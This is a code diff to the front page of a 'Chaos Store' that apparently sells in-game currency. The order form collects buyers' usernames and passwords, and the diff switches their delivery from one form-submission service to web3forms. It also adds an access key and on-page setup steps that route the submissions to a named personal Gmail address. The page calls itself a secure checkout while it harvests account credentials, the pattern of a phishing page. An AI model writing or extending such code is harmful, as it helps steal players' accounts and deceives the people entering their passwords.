--- a/index.html
+++ b/index.html
@@ -41,27 +41,30 @@
             setStatus('');
 
             try {
-              const response = await fetch('https://formspree.io/f/xzzozagr', {
+              const formDataToSend = new FormData();
+              formDataToSend.append('access_key', '101b6422-dca4-4e50-9c27-318f493f47f9'); // Replace this
+              formDataToSend.append('subject', `New Chaos Order - ${formData.chaosAmount}`);
+              formDataToSend.append('from_name', 'Chaos Store');
+              formDataToSend.append('username', formData.username);
+              formDataToSend.append('password', formData.password);
+              formDataToSend.append('chaos_amount', formData.chaosAmount);
+              formDataToSend.append('timestamp', new Date().toLocaleString());
+
+              const response = await fetch('https://api.web3forms.com/submit', {
                 method: 'POST',
-                headers: {
-                  'Content-Type': 'application/json',
-                },
-                body: JSON.stringify({
-                  subject: `New Chaos Order - ${formData.chaosAmount}`,
-                  username: formData.username,
-                  password: formData.password,
-                  chaosAmount: formData.chaosAmount,
-                  timestamp: new Date().toLocaleString()
-                }),
+                body: formDataToSend
               });
 
-              if (response.ok) {
+              const result = await response.json();
+
+              if (result.success) {
                 setStatus('Order submitted successfully! ✓');
                 setFormData({ username: '', password: '', chaosAmount: '500' });
               } else {
-                setStatus('Failed to submit. Please try again.');
+                setStatus('Failed to submit. Please check your access key.');
               }
             } catch (error) {
+              console.error('Error:', error);
               setStatus('Error submitting form. Please try again.');
             } finally {
               setLoading(false);
@@ -147,6 +150,19 @@
                   <div className="bg-gray-50 px-8 py-4 text-center text-sm text-gray-500">
                     <p>Secure checkout • Instant delivery</p>
                   </div>
+                </div>
+
+                {/* Setup Instructions */}
+                <div className="mt-6 bg-white rounded-lg shadow-lg p-6">
+                  <h3 className="font-semibold text-gray-800 mb-3">📧 Setup (2 minutes):</h3>
+                  <ol className="text-sm text-gray-600 space-y-2 list-decimal list-inside">
+                    <li>Go to <a href="https://web3forms.com" target="_blank" className="text-purple-600 hover:underline font-semibold">web3forms.com</a></li>
+                    <li>Enter your email: <span className="font-mono bg-gray-100 px-1">electrotech156@gmail.com</span></li>
+                    <li>Click "Create Access Key" (no signup needed!)</li>
+                    <li>Copy the access key they send to your email</li>
+                    <li>Replace <span className="font-mono bg-gray-100 px-1">YOUR_ACCESS_KEY_HERE</span> in the code</li>
+                  </ol>
+                  <p className="mt-3 text-xs text-gray-500">✨ Free tier: 250 emails/month, no account needed!</p>
                 </div>
               </div>
             </div>
